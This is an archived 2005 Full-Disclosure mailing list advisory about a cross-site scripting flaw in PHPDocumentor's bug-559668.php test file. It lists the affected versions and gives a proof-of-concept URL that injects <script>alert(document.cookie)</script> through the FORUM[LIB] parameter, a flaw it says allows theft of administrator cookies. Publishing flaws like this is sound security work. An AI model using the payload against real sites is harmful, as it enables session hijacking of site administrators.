[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] PHPDocumentor Cross-Site Scripting
From: zeus olimpusklan <zeus.olimpusklan () gmail ! com>
Date: 2005-12-31 4:06:49
Message-ID: 558f59870512302006t134cde5ds4d1abbe85a24cc1a () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
###########################################################################
# Advisory #3 Title: PHPDocumentor Cross-Site Scripting
#
#
# Author: 0o_zeus_o0
# Contact: zeus@diosdelared.com
# Website: olimpusklan.org
# Date: 30/12/2005
# Risk: High
# Vendor Url: http://www.phpdoc.org/
# Affected Software: PHPDocumentor
# Non Affected:
#
# We Are:olimpus klan team
#
#TECHNICAL INFO
#================================================================
#bug allows cookie robbery to the administrator
#
#
#
#Example:
#
#http://example.com/[path]/Documentation/tests/bug-559668.php
?FORUM[LIB]=[XSS]
#
#http://example.com/[path]/Documentation/tests/bug-559668.php
?FORUM[LIB]=<script>alert(document.cookie)</script>
#
#
#
#
#
#VULNERABLE VERSIONS
#================================================================
# T0das
#1.3 RC4
#1.3 RC3
#1.2.3
#1.2.2
#1.2.1
#1.2
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.EliteMexico.Org
#================================================================
#greetz: lady fire, fraude, adi, xoxo ,El_mesias, pandora, mbyte,Rigter
##############################################################################
[Attachment #5 (text/html)]
###########################################################################<br># Advisory #3 \
Title: PHPDocumentor Cross-Site Scripting <br># <br># <br># Author: 0o_zeus_o0<br># Contact: <a \
href="mailto:zeus@diosdelared.com"> zeus@diosdelared.com</a><br># Website: <a \
href="http://olimpusklan.org">olimpusklan.org</a><br># Date: 30/12/2005<br># Risk: High <br># \
Vendor Url: <a href="http://www.phpdoc.org/">http://www.phpdoc.org/</a><br># Affected Software: \
PHPDocumentor <br># Non Affected: <br># <br># We Are:olimpus klan team <br>#<br>#TECHNICAL \
INFO<br>#================================================================<br>#bug allows cookie \
robbery to the administrator<br># <br>#<br>#<br> \
#Example:<br>#<br>#http://example.com/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=[XSS] \
<br>#<br>#http://example.com/[path]/Documentation/tests/bug-559668.php?FORUM[LIB]=<script>alert(document.cookie)</script>
<br>#<br>#<br>#<br>#<br>#<br>#VULNERABLE \
VERSIONS<br>#================================================================<br># \
T0das<br>#1.3 RC4<br>#1.3 RC3<br>#1.2.3<br>#1.2.2<br>#1.2.1<br>#1.2 \
<br>#<br>#================================================================ <br>#Contact \
information<br>#0o_zeus_o0<br>#zeus@<a \
href="http://diosdelared.com">diosdelared.com</a><br>#www.EliteMexico.Org<br>#================================================================<br>#greetz: \
lady fire, fraude, adi, xoxo ,El_mesias, pandora, mbyte,Rigter \
<br>##############################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic